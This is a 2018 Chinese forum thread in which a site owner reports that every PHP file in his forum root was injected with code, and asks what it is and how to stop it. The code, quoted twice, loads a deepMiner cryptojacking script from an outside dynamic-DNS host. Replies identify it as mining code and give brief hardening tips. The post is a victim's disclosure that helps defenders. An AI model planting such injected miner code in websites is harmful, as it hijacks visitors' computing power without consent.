论坛被挂马了，附上木马代码，求大神分析

图样图森破 · 发表于 2018-1-26 09:49:04

本帖最后由图样图森破于 2018-1-26 10:11 编辑

今天打开自己的一个论坛，杀毒软件马上报警，

经检查，发现论坛根目录下的PHP文件全部被插入下面这段代码：

echo "<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
      <script>
         var uri = 'www';
         var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
      if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
         jqueryui.start();
      }
      </script>";

求大神分析，这是啥东东？如何预防再次被挂马？

klon99 · 发表于 2018-1-26 09:51:20

无法预防，因为你压根都不知道别人从哪里进来的

图样图森破 · 发表于 2018-1-26 09:53:38

klon99 发表于 2018-1-26 09:51
无法预防，因为你压根都不知道别人从哪里进来的

对方应该没有拿到管理员权限

ecosway598 · 发表于 2018-1-26 09:53:44

提示: 作者被禁止或删除内容自动屏蔽

图样图森破 · 发表于 2018-1-26 09:56:38

ecosway598 发表于 2018-1-26 09:53
修改 3389 22 21 关闭可关闭的端口只留80 443

文件目录权限设置444

谢谢大佬指点，之前从未做过安全设置，没想到没什么流量的网站也会被盯上

ecosway598 · 发表于 2018-1-26 10:03:48

提示: 作者被禁止或删除内容自动屏蔽

图样图森破 · 发表于 2018-1-26 10:12:13

经分析，发现论坛根目录下的PHP文件全部被插入下面这段代码：

echo "<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
      <script>
         var uri = 'www';
         var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
      if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
         jqueryui.start();
      }
      </script>";

嫂子抱紧我 · 发表于 2018-1-26 10:13:24

还好只是挖矿

ddnpc · 发表于 2018-1-26 10:14:08

提示: 作者被禁止或删除内容自动屏蔽

图样图森破 · 发表于 2018-1-26 10:14:59

嫂子抱紧我发表于 2018-1-26 10:13
还好只是挖矿

果然是挖矿代码啊？

		自动登录	找回密码
密码			注册

ecosway598 ecosway598 当前离线积分 9289	发表于 2018-1-26 09:53:44 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
ecosway598 ecosway598 当前离线积分 9289
	回复支持反对举报

ecosway598 ecosway598 当前离线积分 9289	发表于 2018-1-26 10:03:48 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
ecosway598 ecosway598 当前离线积分 9289
	回复支持反对举报

ddnpc ddnpc 当前离线积分 -22324	发表于 2018-1-26 10:14:08 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
ddnpc ddnpc 当前离线积分 -22324
	回复支持反对举报